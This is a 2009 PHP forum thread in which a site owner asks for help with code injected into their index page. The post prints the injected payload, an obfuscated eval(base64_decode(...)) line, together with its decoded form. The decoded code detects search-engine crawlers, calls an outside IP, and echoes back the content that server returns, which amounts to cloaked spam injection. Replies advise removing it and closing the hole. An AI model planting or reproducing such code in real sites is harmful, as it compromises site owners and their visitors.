rbarnett Posted November 23, 2009 Share Posted November 23, 2009 I noticed the index page on my site was modified this morning and found this code inserted at the bottom of the page: <!--ddgbsre_erd_sdd--><?php eval(base64_decode("aWYoc3RyaXBvcygkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10sICdnb29nbGUnKSBvciBzdHJpcG9zKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSwgJ3lhaG9vJykgb3Igc3RyaXBvcygkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10sICdtc24nKSBvciBzdHJpcG9zKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSwgJ2xpdmUnKSkNCnsNCiAgJHIgPSAnJzsNCiAgaWYoJGY9QGZzb2Nrb3BlbignOTEuMjA3LjQuMTgnLDgwLCRlLCRlciwxMCkgYW5kIEBmcHV0cygkZiwgIkdFVCAvbGlua2l0L2luLnBocD9kb21haW49IiAuIHVybGVuY29kZSgkX1NFUlZFUlsiU0VSVkVSX05BTUUiXSkgLiAiJnVzZXJhZ2VudD0iIC4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkgLiAiIEhUVFAvMS4wXHJcbkhvc3Q6IDkxLjIwNy40LjE4XHJcblxyXG4iKSkNCiAgd2hpbGUoICRsID0gZnJlYWQoJGYsIDEwMjQpKSAkciAuPSAkbDsNCiAgQGZjbG9zZSgkZik7DQogICRwPXN0cnBvcygkciwiXHJcblxyXG4iKTsgZWNobyBzdWJzdHIoJHIsJHArNCk7DQp9")); I printed out what is decoded: if(stripos($_SERVER['HTTP_USER_AGENT'], 'google') or stripos($_SERVER['HTTP_USER_AGENT'], 'yahoo') or stripos($_SERVER['HTTP_USER_AGENT'], 'msn') or stripos($_SERVER['HTTP_USER_AGENT'], 'live')) { $r = ''; if($f=@fsockopen('91.207.4.18',80,$e,$er,10) and @fputs($f, "GET /linkit/in.php?domain=" . urlencode($_SERVER["SERVER_NAME"]) . "&useragent=" . urlencode($_SERVER['HTTP_USER_AGENT']) . " HTTP/1.0\r\nHost: 91.207.4.18\r\n\r\n")) while( $l = fread($f, 1024)) $r .= $l; @fclose($f); $p=strpos($r,"\r\n\r\n"); echo substr($r,$p+4); } Can someone please interpret what this code is trying to do? I noticed that the IP address is coming from the Ukraine. Thank you Quote Link to comment https://forums.phpfreaks.com/topic/182658-please-help-understand-this-code/ Share on other sites More sharing options...
Psycho Posted November 23, 2009 Share Posted November 23, 2009 To be honest it's not worth my time to try and decypher. It can't be good though. It's probably downloading some code off of their server and running it on yours. Just delete it, find the hole they crawled in through and plug it up. Quote Link to comment https://forums.phpfreaks.com/topic/182658-please-help-understand-this-code/#findComment-964034 Share on other sites More sharing options...
rbarnett Posted November 23, 2009 Author Share Posted November 23, 2009 Thank you. I appreciate your response. I'm on the line now with my hosting company to try and do so. Quote Link to comment https://forums.phpfreaks.com/topic/182658-please-help-understand-this-code/#findComment-964044 Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.